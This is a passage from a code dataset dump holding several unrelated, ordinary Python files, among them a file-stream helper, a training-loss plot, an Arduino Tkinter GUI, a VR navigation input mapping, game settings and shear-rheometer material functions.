@property\n def inputStream(self):\n \"\"\"returns file object\n \"\"\"\n if self.__inputStream == None and self.__filePath != None:\n self.__inputStream = open(self.__filePath, \"rb\")\n elif self.__inputStream == None and self.__response != None:\n self.__inputStream = self.__response\n return self.__inputStream\n \n @inputStream.setter\n def inputStream(self, value):\n self.__inputStream = value\n \n def __getValueFromCD(self, key):\n headers = self.__response.info()\n if 'Content-Disposition' in headers:\n # If the response has Content-Disposition, try to get value from it\n cd = dict(map(\n lambda x: x.strip().split('=') if '=' in x else (x.strip(),''),\n headers['Content-Disposition'].split(';')))\n if key in cd:\n value = cd[key].strip(\"\\\"'\")\n if value: return value\n return None\n \n def __getFileNameFromUrl(self, url):\n return os.path.basename(urlparse.urlsplit(url)[2])\n \n","sub_path":"groupdocs/FileStream.py","file_name":"FileStream.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"317137974","text":"import matplotlib.pyplot as plt\ndef valueret(filename):\n s=open(filename,\"r\")\n sdata=s.readlines()[0]\n #print(sdata)\n sdata_list=sdata.split(\" \")\n s_val=[]\n count=0\n for i in sdata_list:\n s_val.append(float(i))\n count=count+1\n return (s_val,count)\n\ns_val,count=valueret(\"shadow.txt\")\nu_val,count=valueret(\"uni.txt\")\nc_list=[]\nfor i in range(1,count+1):\n c_list.append(i)\nplt.plot(c_list,s_val,label=\"LSTM with Shadow Network\")\nplt.plot(c_list,u_val,label=\"LSTM without Shadow Network\")\nplt.xlabel(\"Training Steps\")\nplt.ylabel(\"Training loss\")\nplt.legend()\nplt.savefig(\"Test_LSTM.png\")\nplt.show()\n\n","sub_path":"Results/LSTM/Dropout_00_percent/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"193323702","text":"#!/usr/bin/env python3\n\"\"\"Server start.\"\"\"\n\nimport sys\n\nimport spacepymud\n\nif __name__ == \"__main__\":\n host = ''\n port = int()\n if len(sys.argv) != 3:\n host = 'localhost'\n port = 4000\n else:\n host = sys.argv[1]\n port = int(sys.argv[2])\n\n spm = spacepymud.SpacePyMud((host, port))\n spm.run()\n","sub_path":"spacepymud/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"44019007","text":"from tkinter import *\nfrom controller import Controller\nfrom PIL import Image, ImageTk\n\n\nclass FirmataView:\n def __init__(\n self, title:str=\"Firmata App\",\n winsize:str=\"350x200\",\n label_text:str=\"Push button\",\n button_text:str=\"Take 13 pin\"\n ):\n # main config\n self.window = Tk()\n self.window.title(title)\n self.window.geometry(winsize)\n\n # add label and button\n self._add_label(label_text)\n self._add_button(button_text)\n\n # working with Arduino by manager\n self.controller = Controller()\n\n def clicked(self):\n if not self.controller.am.pin_state[13]:\n self.controller.am.on_13_pin()\n else:\n if self.controller.am.pin_state[13] == 'HIGH':\n self.controller.am.off_13_pin()\n else:\n self.controller.am.on_13_pin()\n\n self.lbl1.configure(text=f\"13 pin state: {self.controller.am.pin_state[13]}\")\n\n def read_data(self):\n self.lbl2.configure(text=self.controller.write_data())\n\n img = ImageTk.PhotoImage(Image.open(\"plot.png\"))\n lbl_img = Label(image=img)\n lbl_img.image = img # keep a reference!\n lbl_img.grid(column=3, row=0)\n\n def _add_label(self, label_text):\n self.lbl1 = Label(self.window, text=label_text)\n self.lbl1.grid(column=0, row=0)\n self.lbl2 = Label(self.window, text=\"Read data from Arduino\")\n self.lbl2.grid(column=0, row=1)\n\n def _add_button(self, button_text):\n btn1 = Button(self.window, text=button_text, command=self.clicked)\n btn1.grid(column=1, row=0)\n btn2 = Button(self.window, text=\"Read\", command=self.read_data)\n btn2.grid(column=1, row=1)\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"481359428","text":"class SBPClass:\n def __init__(self, grid_obj):\n import numpy as np\n self.acc = 2\n\n N = grid_obj.Nx\n dx = grid_obj.dx\n\n if self.acc == 2:\n d = 1/dx\n V = 1/dx*np.ones((1,N+1))\n V[0,0] = V[0,0]*2\n V[0,-1] = V[0,-1]*2\n self.Pinv = np.diag(V[0])\n self.P = np.diag(1./V[0])\n Z = np.zeros((1, N+1))\n O = np.ones((1, N))\n Q = 0.5*(np.diag(Z[0]) + np.diag(O[0], 1) - np.diag(O[0], -1))\n Q[0,0] = -0.5\n Q[-1,-1] = 0.5\n\n self.D1 = np.dot(self.Pinv, Q)\n self.D2 = np.dot(self.D1, self.D1)\n self.BS = self.D1\n","sub_path":"Differential Equations/PDE/SBPSAT/HyperbolicSystem1D/SBPClass.py","file_name":"SBPClass.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"619431729","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('index',views.index, name='index'),\n path('',views.signup,name='signup'),\n path('mystatus/', views.status_view, name = 'mystatus'),\n path('success/', views.success, name = 'success'),\n path('status//delete/', views.StatusDeleteView.as_view(), name='StatusDeleteView'),\n path('status/detail//',views.detail_status, name='detail_status'),\n path('status/like',views.like_status,name=\"like_status\"),\n ]","sub_path":"network/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"11244157","text":"#!/usr/bin/python\n\n## @file\n# Contains class InputMapping.\n\n# import avango-guacamole libraries\nimport avango\nimport avango.gua\nimport avango.script\nimport avango.daemon\nfrom avango.script import field_has_changed\n\n# import framework libraries\nfrom GroundFollowing import *\nimport Utilities\n\n# import of other libraries\nimport time\nimport math\n\n\n## This class accumulates the relative device inputs to an absolute matrix forwarded to the platform\n# and uses an instance of GroundFollowing to correct this matrix with respect to gravity.\nclass InputMapping(avango.script.Script):\n\n ## @var mf_rel_input_values\n # The relative input values of the device.\n mf_rel_input_values = avango.MFFloat()\n\n ## @var sf_station_mat\n # The absolute matrix indicating where the device is placed in space.\n sf_station_mat = avango.gua.SFMatrix4()\n sf_station_mat.value = avango.gua.make_identity_mat()\n\n # internal fields\n ## @var sf_abs_uncorrected_mat\n # The absolute matrix to accumulate the relative inputs on. Will be corrected by GroundFollowing instance.\n sf_abs_uncorrected_mat = avango.gua.SFMatrix4()\n sf_abs_uncorrected_mat.value = avango.gua.make_identity_mat()\n\n ## @var sf_scale\n # The current scaling factor of this input mapping.\n sf_scale = avango.SFFloat()\n sf_scale.value = 1.0\n\n # output field\n ## @var sf_abs_mat\n # The absolute matrix after GroundFollowing correction.\n sf_abs_mat = avango.gua.SFMatrix4()\n sf_abs_mat.value = avango.gua.make_identity_mat()\n\n ## Default constructor.\n def __init__(self):\n self.super(InputMapping).__init__()\n\n # attributes\n ## @var realistic\n # Boolean value to indicate if the user is navigating in 3-DOF (realistic) or 6-DOF (unrealistic) mode.\n self.realistic = True\n\n ## @var blocked\n # Boolean variable indicating if the device input is blocked (e.g. when in coupling animation)\n self.blocked = False\n\n ## @var lf_quat_angle\n # Quaternion angle of last frame to prevent blackscreen. Used if new angle is nan.\n self.lf_quat_angle = 0.0\n\n # factors for input amplifying\n ## @var input_trans_factor\n # Factor to modify the translation input.\n self.input_trans_factor = 1.0\n\n ## @var input_rot_factor\n # Factor to modify the rotation input.\n self.input_rot_factor = 1.0\n\n ## @var min_scale\n # The minimum scaling factor that can be applied.\n self.min_scale = 0.0001\n\n ## @var max_scale\n # The maximum scaling factor that can be applied.\n self.max_scale = 10000.0\n \n ## @var scale_stop_time\n # Time at which a scaling process stopped at a fixed step.\n self.scale_stop_time = None\n\n ## @var scale_stop_duration\n # Time how long a scaling process is stopped at a fixed step in seconds.\n self.scale_stop_duration = 1.0\n\n ## Custom constructor.\n # @param NAVIGATION The navigation instance from which this input mapping is created.\n # @param DEVICE_INSTANCE Instance of Device class to take the input values from.\n # @param GROUND_FOLLOWING_INSTANCE Instance of GroundFollowing to be used for matrix correction.\n # @param STARTING_MATRIX Initial matrix to accumulate the relative inputs on.\n # @param INVERT Boolean indicating if the input values should be inverted.\n def my_constructor(self, NAVIGATION, DEVICE_INSTANCE, GROUND_FOLLOWING_INSTANCE, STARTING_MATRIX, INVERT):\n\n ## @var NAVIGATION\n # Reference to the Navigation instance from which this InputMapping is created.\n self.NAVIGATION = NAVIGATION\n\n ## @var GROUND_FOLLOWING_INSTANCE\n # Reference to the GroundFollowing instance used by this InputMapping.\n self.GROUND_FOLLOWING_INSTANCE = GROUND_FOLLOWING_INSTANCE\n\n ## @var DEVICE_INSTANCE\n # Reference to Device instance used by this InputMapping.\n self.DEVICE_INSTANCE = DEVICE_INSTANCE\n\n ## @var invert\n # Boolean indicating if the input values should be inverted.\n self.invert = INVERT\n\n # connect device fields\n self.mf_rel_input_values.connect_from(DEVICE_INSTANCE.mf_dof)\n self.sf_station_mat.connect_from(DEVICE_INSTANCE.sf_station_mat)\n\n # connect ground following fields\n GROUND_FOLLOWING_INSTANCE.sf_abs_input_mat.connect_from(self.sf_abs_uncorrected_mat)\n GROUND_FOLLOWING_INSTANCE.sf_scale.connect_from(self.sf_scale)\n self.sf_abs_mat.connect_from(GROUND_FOLLOWING_INSTANCE.sf_abs_output_mat)\n\n # create feedback loop\n self.sf_abs_uncorrected_mat.connect_weak_from(self.sf_abs_mat)\n\n # set the starting position\n self.set_abs_mat(STARTING_MATRIX)\n\n\n ## Evaluated when device input values change.\n @field_has_changed(mf_rel_input_values)\n def mf_rel_input_values_changed(self):\n \n if self.blocked == False:\n\n # map scale input\n _scale_input = self.mf_rel_input_values.value[6]\n if _scale_input != 0.0:\n self.set_scale(self.sf_scale.value * (1.0 + _scale_input * 0.015))\n \n _x = self.mf_rel_input_values.value[0]\n _y = self.mf_rel_input_values.value[1]\n _z = self.mf_rel_input_values.value[2]\n\n _rx = self.mf_rel_input_values.value[3]\n _ry = self.mf_rel_input_values.value[4]\n _rz = self.mf_rel_input_values.value[5]\n\n # invert movement if activated\n if self.invert:\n _x = -_x\n _y = -_y\n _z = -_z\n _rx = -_rx\n _ry = -_ry\n _rz = -_rz\n \n # delete certain values that create an unrealistic movement\n if self.realistic:\n _y = 0.0\n _rx = 0.0\n _rz = 0.0\n \n # get translation values from input device\n _trans_vec = avango.gua.Vec3(_x,_y,_z)\n _trans_input = _trans_vec.length()\n\n # get rotation values from input device\n _rot_vec = avango.gua.Vec3(_rx,_ry,_rz) * self.input_rot_factor\n _rot_input = _rot_vec.length()\n \n # only accumulate inputs on absolute matrix when the device values change\n if _trans_input != 0.0 or _rot_input != 0.0:\n\n # transfer function for translation\n if _trans_input != 0.0:\n _trans_vec.normalize()\n _trans_vec *= math.pow(min(_trans_input,1.0), 3) * self.input_trans_factor * self.sf_scale.value\n\n # global platform rotation in the world\n _platform_quat = self.sf_abs_mat.value.get_rotate()\n\n # Fix if quaternion angle is nan\n _quat_angle = _platform_quat.get_angle()\n\n if math.isnan(_quat_angle) == False:\n _platform_rot_mat = avango.gua.make_rot_mat(_quat_angle, _platform_quat.get_axis())\n self.lf_quat_angle = _quat_angle\n else:\n _platform_rot_mat = avango.gua.make_rot_mat(self.lf_quat_angle, _platform_quat.get_axis())\n\n # global rotation of the device in the world\n _device_forward_yaw = Utilities.get_yaw(self.sf_station_mat.value)\n _device_rot_mat = avango.gua.make_rot_mat(math.degrees(_device_forward_yaw), 0, 1, 0)\n\n # combined platform and device rotation\n _combined_rot_mat = _platform_rot_mat * _device_rot_mat\n \n # rotation center of the device\n _rot_center = self.sf_station_mat.value.get_translate() * self.sf_scale.value\n\n # transformed translation, rotation and rotation center\n _transformed_trans_vec = self.transform_vector_with_matrix(_trans_vec, _combined_rot_mat)\n\n _transformed_rot_vec = self.transform_vector_with_matrix(_rot_vec, _combined_rot_mat)\n _transformed_rot_center = self.transform_vector_with_matrix(_rot_center, _platform_rot_mat)\n \n # create new transformation matrix\n _new_mat = avango.gua.make_trans_mat(_transformed_trans_vec) * \\\n self.sf_abs_mat.value * \\\n avango.gua.make_trans_mat(_rot_center) * \\\n avango.gua.make_rot_mat( _rot_vec.y, 0, 1, 0) * \\\n avango.gua.make_rot_mat( _rot_vec.x, 1, 0, 0) * \\\n avango.gua.make_rot_mat( _rot_vec.z, 0, 0, 1) * \\\n avango.gua.make_trans_mat(_rot_center * -1)\n\n '''\n # update matrix on coupled navigations\n _global_rot_center = self.sf_abs_mat.value * _rot_center\n _global_rot_center = avango.gua.Vec3(_global_rot_center.x, _global_rot_center.y, _global_rot_center.z)\n\n for _navigation in self.NAVIGATION.coupled_navigations:\n _navigation.inputmapping.modify_abs_uncorrected_mat(_transformed_trans_vec, _transformed_rot_vec, _global_rot_center)\n '''\n else:\n # the device values are all equal to zero\n _new_mat = self.sf_abs_mat.value\n\n # save the computed new matrix\n self.sf_abs_uncorrected_mat.value = _new_mat \n\n ## Modify the uncorrected matrix of this input mapping with specific values. Used for coupling purposes.\n # @param TRANSFORMED_TRANS_VECTOR The translation vector to be applied.\n # @param TRANSFORMED_ROT_VECTOR The vector containing the rotation values to be applied.\n # @param ROTATION_CENTER The center to rotate around.\n def modify_abs_uncorrected_mat(self, TRANSFORMED_TRANS_VECTOR, TRANSFORMED_ROT_VECTOR, ROTATION_CENTER):\n \n # compute new translation\n _new_pos = TRANSFORMED_TRANS_VECTOR + self.sf_abs_mat.value.get_translate()\n \n # compute offset to rotation center\n _rot_center_offset = ROTATION_CENTER - _new_pos\n\n # create new transformation matrix\n _quat = self.sf_abs_mat.value.get_rotate()\n\n _new_mat = avango.gua.make_trans_mat(_new_pos) * \\\n avango.gua.make_trans_mat(_rot_center_offset) * \\\n avango.gua.make_rot_mat( TRANSFORMED_ROT_VECTOR.y, 0, 1, 0) * \\\n avango.gua.make_rot_mat( TRANSFORMED_ROT_VECTOR.x, 1, 0, 0) * \\\n avango.gua.make_rot_mat( TRANSFORMED_ROT_VECTOR.z, 0, 0, 1) * \\\n avango.gua.make_trans_mat(_rot_center_offset * -1) * \\\n avango.gua.make_rot_mat(_quat.get_angle(), _quat.get_axis())\n \n # save the computed new matrix\n self.sf_abs_mat.value = _new_mat\n \n ## Transforms a vector using a transformation matrix.\n # @param VECTOR The vector to be transformed.\n # @param MATRIX The matrix to be applied for transformation.\n def transform_vector_with_matrix(self, VECTOR, MATRIX):\n _trans_vec = MATRIX * VECTOR\n return avango.gua.Vec3(_trans_vec.x, _trans_vec.y, _trans_vec.z)\n\n ## Set a value for sf_abs_mat.\n # @param MATRIX The matrix to be set to.\n def set_abs_mat(self, MATRIX):\n self.sf_abs_mat.value = MATRIX\n\n ## Sets the translation and rotation input factors.\n # @param TRANSLATION_FACTOR Translation modification factor to be set. 1.0 by default.\n # @param ROTATION_FACTOR Rotation modification factor to be set. 1.0 by default.\n def set_input_factors(self, TRANSLATION_FACTOR = 1.0, ROTATION_FACTOR = 1.0):\n self.input_trans_factor = TRANSLATION_FACTOR\n self.input_rot_factor = ROTATION_FACTOR\n\n ## Activates the realistic mode (only 3 DOF navigation, GroundFollowing enabled)\n def activate_realistic_mode(self):\n self.realistic = True\n self.GROUND_FOLLOWING_INSTANCE.activate()\n\n ## Activates the unrealistic mode (6 DOF navigation, GroundFollowing disabled)\n def deactivate_realistic_mode(self):\n self.realistic = False\n self.GROUND_FOLLOWING_INSTANCE.deactivate()\n\n\n ## Applies a new scaling to this input mapping.\n # @param SCALE The new scaling factor to be applied.\n # @param CONSIDER_SNAPPING Boolean saying if the scaling should snap at powers of ten.\n def set_scale(self, SCALE, CONSIDER_SNAPPING = True):\n\n if CONSIDER_SNAPPING == False:\n self.sf_scale.value = SCALE\n return\n \n if self.scale_stop_time == None:\n \n _old_scale = self.sf_scale.value\n _old_scale = round(_old_scale,6)\n \n _new_scale = max(min(SCALE, self.max_scale), self.min_scale)\n _new_scale = round(_new_scale,6)\n \n # auto pause at dedicated scale levels\n if (_old_scale < 1000.0 and _new_scale > 1000.0) or (_new_scale < 1000.0 and _old_scale > 1000.0):\n #print(\"snap 1000:1\")\n _new_scale = 1000.0\n self.scale_stop_time = time.time()\n \n elif (_old_scale < 100.0 and _new_scale > 100.0) or (_new_scale < 100.0 and _old_scale > 100.0):\n #print(\"snap 100:1\")\n _new_scale = 100.0\n self.scale_stop_time = time.time()\n \n elif (_old_scale < 10.0 and _new_scale > 10.0) or (_new_scale < 10.0 and _old_scale > 10.0):\n #print(\"snap 10:1\")\n _new_scale = 10.0\n self.scale_stop_time = time.time()\n \n elif (_old_scale < 1.0 and _new_scale > 1.0) or (_new_scale < 1.0 and _old_scale > 1.0):\n #print(\"snap 1:1\")\n _new_scale = 1.0\n self.scale_stop_time = time.time()\n\n elif (_old_scale < 0.1 and _new_scale > 0.1) or (_new_scale < 0.1 and _old_scale > 0.1):\n #print(\"snap 1:10\")\n _new_scale = 0.1\n self.scale_stop_time = time.time()\n\n elif (_old_scale < 0.01 and _new_scale > 0.01) or (_new_scale < 0.01 and _old_scale > 0.01):\n #print(\"snap 1:100\")\n _new_scale = 0.01\n self.scale_stop_time = time.time()\n\n elif (_old_scale < 0.001 and _new_scale > 0.001) or (_new_scale < 0.001 and _old_scale > 0.001):\n #print(\"snap 1:1000\")\n _new_scale = 0.001\n self.scale_stop_time = time.time()\n\n \n '''\n # scale relative to a reference point\n _scale_center_offset = self.sf_station_mat.value.get_translate() \n \n if _scale_center_offset.length() > 0: # scale/rotation center defined\n _pos1 = _scale_center_offset * _old_scale\n _pos2 = _scale_center_offset * _new_scale\n\n _vec = _pos1 - _pos2\n\n self.sf_abs_mat.value = self.sf_abs_mat.value * avango.gua.make_trans_mat(_vec)\n '''\n\n self.sf_scale.value = _new_scale # apply new scale\n\n else:\n\n if (time.time() - self.scale_stop_time) > self.scale_stop_duration:\n self.scale_stop_time = None\n","sub_path":"lib-server/InputMapping.py","file_name":"InputMapping.py","file_ext":"py","file_size_in_byte":13806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"39005524","text":"# -*- coding=utf-8 -*-\n\"\"\"\n2019.08.12 游戏设置\n\"\"\"\n\nclass Settings():\n \"\"\" 存储游戏设置 \"\"\"\n def __init__(self):\n \"\"\" 游戏初始化设置 \"\"\"\n # 静态参数设置\n self.caption = \"飞机大战\"\n\n # 屏幕设置\n self.screen_width = 400\n self.screen_height = 600\n self.background_color = (230, 250, 230)\n\n # 飞机设置\n self.plane_limit = 2\n\n # 子弹设置\n self.bullet_width = 5\n self.bullet_height = 15\n self.bullet_color = (60, 120, 120)\n self.bullets_allowed = 3 # 限制子弹数量\n\n # 敌机碰壁后下降速度\n self.enemy_drop_speed = 5\n\n # 加快游戏节奏参数\n self.speedup_scale = 1.3\n # 提升游戏得分\n self.score_scale = 1.5\n\n self.initialize_dynamic_settings()\n\n def initialize_dynamic_settings(self):\n \"\"\" 动态参数初始化 \"\"\"\n self.plane_speed_factor = 10\n self.bullet_speed_factor = 10\n self.enemy_speed_factor = 5\n self.enemy_direction = 1 # 1表示右移,-1表示左移\n self.enemy_score = 50 # 消灭敌机的基础得分\n\n def increase_speed(self):\n \"\"\" 加速提高难度,提升击落敌机分数 \"\"\"\n self.plane_speed_factor *= self.speedup_scale\n self.bullet_speed_factor *= self.speedup_scale\n self.enemy_speed_factor *= self.speedup_scale\n self.enemy_score = int(self.enemy_score * self.score_scale)\n\n","sub_path":"AircraftWar/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"510499933","text":"#!/usr/bin/env python\nfrom __future__ import division\n\n#-----------------------------------------------------------------------------\n# Copyright (c) 2013, The BiPy Development Team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n\n__author__ = \"Jai Ram Rideout\"\n__copyright__ = \"Copyright 2013, The pyqi project\"\n__credits__ = [\"Jai Ram Rideout\", \"Daniel McDonald\"]\n__license__ = \"BSD\"\n__version__ = \"0.2.0-dev\"\n__maintainer__ = \"Jai Ram Rideout\"\n__email__ = \"jai.rideout@gmail.com\"\n\nfrom pyqi.core.command import (Command, CommandIn, CommandOut, \n ParameterCollection)\n\nheader_format = \"\"\"#!/usr/bin/env python\nfrom __future__ import division\n\n__author__ = \"%(author)s\"\n__copyright__ = \"%(copyright)s\"\n__credits__ = [%(credits)s]\n__license__ = \"%(license)s\"\n__version__ = \"%(version)s\"\n__maintainer__ = \"%(author)s\"\n__email__ = \"%(email)s\"\n\"\"\"\n\nclass CodeHeaderGenerator(Command):\n BriefDescription = \"Generate header code for use in a Python file\"\n LongDescription = (\"Generate valid Python code containing header \"\n \"information, such as author, email address, \"\n \"maintainer, version, etc.. This code can be placed at \"\n \"the top of a Python file.\")\n\n CommandIns = ParameterCollection([\n CommandIn(Name='author', DataType=str,\n Description='author/maintainer name', Required=True),\n CommandIn(Name='email', DataType=str,\n Description='maintainer email address', Required=True),\n CommandIn(Name='license', DataType=str,\n Description='license (e.g., BSD)', Required=True),\n CommandIn(Name='copyright', DataType=str,\n Description='copyright (e.g., Copyright 2013, The pyqi '\n 'project)', Required=True),\n CommandIn(Name='version', DataType=str,\n Description='version (e.g., 0.1)', Required=True),\n CommandIn(Name='credits', DataType=list,\n Description='list of other authors',\n Required=False, Default=None)\n ])\n\n CommandOuts = ParameterCollection([\n CommandOut(Name='result', DataType=list,\n Description='the resulting header')])\n\n def run(self, **kwargs):\n # Build a string formatting dictionary for the file header.\n head = {}\n head['author'] = kwargs['author']\n head['email'] = kwargs['email']\n head['license'] = kwargs['license']\n head['copyright'] = kwargs['copyright']\n head['version'] = kwargs['version']\n\n # Credits always includes author.\n credits = [head['author']]\n if kwargs['credits']:\n credits.extend(kwargs['credits'])\n\n f = lambda x: '\"%s\"' % x\n head['credits'] = ', '.join(map(f, credits))\n\n return {'result': (header_format % head).split('\\n')}\n\nCommandConstructor = CodeHeaderGenerator\n","sub_path":"pyqi/commands/code_header_generator.py","file_name":"code_header_generator.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"169048968","text":"class Solution(object):\n # 指针重新排序数组,最后把0补上\n '''\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n index=0\n for k in range(len(nums)):\n if (nums[k]!=0):\n nums[index]=nums[k]\n index+=1\n for k in range(index,len(nums)):\n nums[k]=0\n\n return nums\n '''\n\n # 冒泡排序\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n i = 0\n for k in range(len(nums)):\n if nums[k] != 0:\n nums[i], nums[k] = nums[k], nums[i]\n i += 1\n\n return nums\n\n\nnums=[0,1,0,3,12,0,3]\n#nums=[0,0,0,0,0,1]\n\nprint(Solution().moveZeroes(nums))","sub_path":"leetcode/easy/283_Move Zeroes.py","file_name":"283_Move Zeroes.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"191949300","text":"import numpy as np\r\nfrom .buildBeams import buildBeams\r\nfrom .materials import Material\r\nfrom typing import Sequence\r\n\r\n\r\ndef getQuadrature(N: int, xmin: float, xmax: float) -> (np.ndarray, np.ndarray):\r\n \"\"\"\r\n Provides N quadrature points for an integration from xmin to xmax together with their weights.\r\n\r\n Parameters\r\n ----------\r\n N : int\r\n The number of quadrature points to use. Has to be 1 <= N <= 5.\r\n xmin : float\r\n The start of the integration range\r\n xmax : float\r\n The end of the integration range\r\n\r\n Returns\r\n -------\r\n points : np.ndarray\r\n The points of the quadrature\r\n w : np.ndarray\r\n The weights of the points\r\n \"\"\"\r\n if N < 1:\r\n raise ValueError()\r\n\r\n if N == 1:\r\n points = [0]\r\n w = [2]\r\n\r\n if N == 2:\r\n points = [-np.sqrt(1 / 3), np.sqrt(1 / 3)]\r\n w = [1, 1]\r\n\r\n if N == 3:\r\n points = [-np.sqrt(3 / 5), 0, np.sqrt(3 / 5)]\r\n w = [5 / 9, 8 / 9, 5 / 9]\r\n\r\n if N == 4:\r\n points = [-np.sqrt(3 / 7 - 2 / 7 * np.sqrt(6 / 5)), +np.sqrt(3 / 7 - 2 / 7 * np.sqrt(6 / 5)),\r\n -np.sqrt(3 / 7 + 2 / 7 * np.sqrt(6 / 5)), +np.sqrt(3 / 7 + 2 / 7 * np.sqrt(6 / 5))]\r\n w = [(18 + np.sqrt(30)) / 36, (18 + np.sqrt(30)) / 36, (18 - np.sqrt(30)) / 36, (18 - np.sqrt(30)) / 36]\r\n\r\n if N == 5:\r\n points = [0,\r\n -1 / 3 * np.sqrt(5 - 2 * np.sqrt(10 / 7)), +1 / 3 * np.sqrt(5 - 2 * np.sqrt(10 / 7)),\r\n -1 / 3 * np.sqrt(5 + 2 * np.sqrt(10 / 7)), +1 / 3 * np.sqrt(5 + 2 * np.sqrt(10 / 7))]\r\n w = [128 / 225, (322 + 13 * np.sqrt(70)) / 900, (322 + 13 * np.sqrt(70)) / 900, (322 - 13 * np.sqrt(70)) / 900,\r\n (322 - 13 * np.sqrt(70)) / 900]\r\n\r\n if N > 5:\r\n raise ValueError()\r\n\r\n points = np.array(points)\r\n w = np.array(w)\r\n factor = (xmax - xmin) / 2\r\n points = factor * points + (xmax + xmin) / 2\r\n w = w * factor\r\n return points, w\r\n\r\n\r\ndef combineQuadrature(p1_w1: Sequence, p2_w2: Sequence) -> (np.ndarray, np.ndarray, np.ndarray):\r\n \"\"\"\r\n Combine the quadratures of two different axes.\r\n\r\n Parameters\r\n ----------\r\n p1_w1 : tuple\r\n the points and weights for the first axis\r\n p2_w2 : tuple\r\n the points and weights for the second axis\r\n\r\n Returns\r\n -------\r\n x : np.ndarray\r\n the points for the first axis\r\n y : np.ndarray\r\n the points for the second axis\r\n w : np.ndarray\r\n the combined weights for the points\r\n \"\"\"\r\n p1, w1 = p1_w1\r\n p2, w2 = p2_w2\r\n x, y = [f.ravel() for f in np.meshgrid(p1, p2)]\r\n w = (w1[:, None] * w2[None, :]).ravel()\r\n return x, y, w\r\n\r\n\r\ndef getShearRheometerStress(gamma: np.ndarray, material: Material, s: np.ndarray = None) -> (np.ndarray, np.ndarray):\r\n r\"\"\"\r\n Get the stress for a given strain of the material in a shear rheometer.\r\n\r\n The following shear deformation :math:`\\mathbf{F}` is applied to the material:\r\n\r\n .. math::\r\n \\mathbf{F}(\\gamma) =\r\n \\begin{pmatrix}\r\n 1 & \\gamma & 0 \\\\\r\n 0 & 1 & 0 \\\\\r\n 0 & 0 & 1 \\\\\r\n \\end{pmatrix}\r\n\r\n and the resulting stress is obtained by calculating numerically the derivative of the energy density :math:`W` with\r\n respect to the strain :math:`\\gamma`:\r\n\r\n .. math::\r\n \\sigma(\\gamma) = \\frac{dW(\\mathbf{F}(\\gamma))}{d\\gamma}\r\n\r\n Parameters\r\n ----------\r\n gamma : ndarray\r\n The applied strain.\r\n material : :py:class:`~.materials.Material`\r\n The material model to use.\r\n\r\n Returns\r\n -------\r\n strain : ndarray\r\n The strain values.\r\n stress : ndarray\r\n The resulting stress.\r\n \"\"\"\r\n if s is None:\r\n s = buildBeams(30)\r\n\r\n F = np.eye(3)\r\n F = np.tile(F, (gamma.shape[0], 1, 1))\r\n F[:, 0, 1] = np.tan(gamma)\r\n\r\n s_bar = F @ s.T\r\n\r\n s_abs = np.linalg.norm(s_bar, axis=-2)\r\n\r\n eps = material.energy(s_abs - 1)\r\n\r\n W = np.mean(eps, axis=-1)\r\n dW = np.diff(W) / np.diff(gamma)\r\n return gamma[:-1] + np.diff(gamma) / 2, dW\r\n\r\n\r\ndef getShearRheometerStressRotation(gamma, material, H=1e-3, R=10e-3, s=30, q=2):\r\n if isinstance(s, int):\r\n s = buildBeams(s)\r\n\r\n x_r, z_h, w = combineQuadrature(getQuadrature(q, 0, 1), getQuadrature(q, 0, 1))\r\n\r\n F = np.zeros((gamma.shape[0], len(z_h), 3, 3))\r\n theta = gamma * H / R\r\n theta_p = theta[:, None] * z_h[None, :]\r\n\r\n cos, sin = np.cos(theta_p), np.sin(theta_p)\r\n xtheta_h = x_r * theta[:, None] * R / H\r\n F[:, :, 0, 0], F[:, :, 0, 1], F[:, :, 0, 2] = cos, -sin, -sin * xtheta_h\r\n F[:, :, 1, 0], F[:, :, 1, 1], F[:, :, 1, 2] = sin, cos, cos * xtheta_h\r\n F[:, :, 2, 2] = 1\r\n\r\n s_bar = F @ s.T\r\n\r\n s_abs = np.linalg.norm(s_bar, axis=-2)\r\n eps = material.energy(s_abs - 1)\r\n\r\n W = np.mean(eps, axis=-1)\r\n W = np.average(W, axis=-1, weights=w)\r\n dW = np.diff(W) / np.diff(gamma)\r\n\r\n return gamma[:-1] + np.diff(gamma) / 2, dW\r\n\r\n\r\ndef getStretchThinning(lambda_h, lambda_v, material, s=None):\r\n r\"\"\"\r\n Get the thinning of the material for streching.\r\n\r\n The following deformation :math:`\\mathbf{F}` is applied to the material, composed of a horizontal and a vertical\r\n stretching:\r\n\r\n .. math::\r\n \\mathbf{F}(\\gamma) =\r\n \\begin{pmatrix}\r\n \\lambda_h & 0 & 0 \\\\\r\n 0 & 1 & 0 \\\\\r\n 0 & 0 & \\lambda_v \\\\\r\n \\end{pmatrix}\r\n\r\n the resulting energy density 